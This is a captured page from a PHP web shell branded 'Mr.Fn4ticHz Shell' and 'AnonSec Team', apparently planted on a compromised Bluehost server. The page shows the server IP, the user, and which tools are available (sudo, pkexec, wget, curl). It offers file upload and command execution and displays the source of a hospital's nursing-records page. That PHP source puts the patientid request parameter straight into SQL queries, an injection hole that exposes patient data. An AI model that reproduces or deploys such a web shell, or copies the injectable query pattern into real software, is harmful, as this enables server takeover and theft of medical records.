Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 18.116.21.152
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in/nurshingrecods.php
<?php
session_start();
require_once('../DBManager.php');
require_once('../patientmanager.php');
include("header.php");
include("dashboarddocument.php");
?>

 <div class="content-wrapper">
    <!-- Content Header (Page header) -->
    <section class="content-header">
<table width="100%" id="example2" class="table table-bordered table-hover">  
      <tbody>
	           
            <?php
		  	$sqlpatient= "SELECT * FROM patient WHERE patientid='$_GET[patientid]'";
			$qsqlpatient = mysqli_query($con,$sqlpatient);
			while($rspatient=mysqli_fetch_array($qsqlpatient))
			{
				echo "<input type='hidden' name='patientid' id='patientid' value='$rspatient[patientid]'></td>";
			}
		  ?>
		  <h3 align="center">Nursing Plan Of care</h3>
		  <tr>
		      <th>Date/time</th>
		      <th></th>
		      <th>Note</th>
		  </tr>
        	<tr>
        	 <td width="20%"><input type="datetime-local" name="date"> </td>    
          <td width="20%">Assessment:</td>
          <td width="60%"><input type="text"  name="bp" id="bp" ></td>
        </tr>
        		<tr>
        	 <td width="20%"><input type="datetime-local" name="date"> </td>    
          <td width="20%">Nursing diagnosis:</td>
          <td width="60%"><input type="text"  name="bp" id="bp" ></td>
        </tr>
        		<tr>
        	 <td width="20%"><input type="datetime-local" name="date"> </td>    
          <td width="20%">Plan of Action:</td>
          <td width="60%"><input type="text"  name="bp" id="bp" ></td>
        </tr>
        
        		<tr>
        	 <td width="20%"><input type="datetime-local" name="date"> </td>    
          <td width="20%">Implementation:</td>
          <td width="60%"><input type="text"  name="bp" id="bp" ></td>
        </tr>
        		<tr>
        	 <td width="20%"><input type="datetime-local" name="date"> </td>    
          <td width="20%">Evaluation:</td>
          <td width="60%"><input type="text"  name="bp" id="bp" ></td>
        </tr>
           </tbody>
    </table>
    	<table width="100%" id="example2" class="table table-bordered table-hover">  
      <tbody>
	           
            <?php
		  	$sqlpatient= "SELECT * FROM patient WHERE patientid='$_GET[patientid]'";
			$qsqlpatient = mysqli_query($con,$sqlpatient);
			while($rspatient=mysqli_fetch_array($qsqlpatient))
			{
				echo "<input type='hidden' name='patientid' id='patientid' value='$rspatient[patientid]'></td>";
			}
		  ?>
		  <h3 align="center">Action Performed</h3>
		  <tr>
		      <th></th>
		      <th>Add Record </th>
		      <th>Timing</th>
		  </tr>
        	<tr>
        
          <td width="20%">Blood transfusion </td>
          <td width="60%"><input type="text"  name="bp" id="bp" ></td>
            	 <td width="20%"><input type="datetime-local" name="date"> </td>  
        </tr>
        		<tr>
            
          <td width="20%">DRESSING </td>
          <td width="60%"><input type="text"  name="bp" id="bp" ></td>
          	 <td width="20%"><input type="datetime-local" name="date"> </td>
        </tr>
        		<tr>
           
          <td width="20%">Catheterization </td>
          <td width="60%"><input type="text"  name="bp" id="bp" ></td>
          	 <td width="20%"><input type="datetime-local" name="date"> </td> 
        </tr>
        
        		<tr>
          
          <td width="20%">Physiotherapy </td>
          <td width="60%"><input type="text"  name="bp" id="bp" ></td>
          	 <td width="20%"><input type="datetime-local" name="date"> </td>  
        </tr>
        		<tr>
        	   
          <td width="20%">Dietician</td>
          <td width="60%"><input type="text"  name="bp" id="bp" ></td>
           <td width="20%"><input type="datetime-local" name="date"> </td> 
        </tr>
           </tbody>
    </table>
    	<table width="100%" id="example2" class="table table-bordered table-hover">  
      <tbody>
	           
            <?php
		  	$sqlpatient= "SELECT * FROM patient WHERE patientid='$_GET[patientid]'";
			$qsqlpatient = mysqli_query($con,$sqlpatient);
			while($rspatient=mysqli_fetch_array($qsqlpatient))
			{
				echo "<input type='hidden' name='patientid' id='patientid' value='$rspatient[patientid]'></td>";
			}
		  ?>
		  <h3 align="center">Action Performed</h3>
		  <tr>
		      <th></th>
		   		      <th>Start Timing</th>
		       <th>End Timing</th>
		  </tr>
        	<tr>
        
          <td width="40%">OXYGEN </td>
         <td width="30%"><input type="datetime-local" name="date"> </td>
            	 <td width="30%"><input type="datetime-local" name="date"> </td>  
        </tr>
        		<tr>
            
          <td width="40%">AIR BED </td>
           <td width="30%"><input type="datetime-local" name="date"> </td>
          	 <td width="30%"><input type="datetime-local" name="date"> </td>
        </tr>
        		<tr>
           
          <td width="40%">Nebulization </td>
      <td width="30%"><input type="datetime-local" name="date"> </td>
          	 <td width="30%"><input type="datetime-local" name="date"> </td> 
        </tr>
        
           </tbody>
    </table>

Anon7 - 2022
AnonSec Team